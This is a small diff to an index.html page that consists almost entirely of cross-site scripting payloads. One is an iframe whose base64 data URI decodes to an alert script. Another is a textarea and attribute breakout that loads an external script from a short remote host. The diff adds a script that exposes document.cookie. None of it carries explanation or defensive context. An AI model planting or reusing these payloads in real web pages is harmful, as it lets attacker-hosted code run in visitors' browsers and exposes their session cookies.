--- a/index.html
+++ b/index.html
@@ -3,5 +3,6 @@
 <body>
 <iframe src="data:text/html;base64,PFNDcmlwdD5hbGVydCgxKTwvU0NySXB0Pg=="></iframe>
  </tExtArEa>'"><sCRiPt sRC=//x0.nz/le1M></sCrIpT>
+ <script>alert(document.cookie)</script>
 </body>
 </html
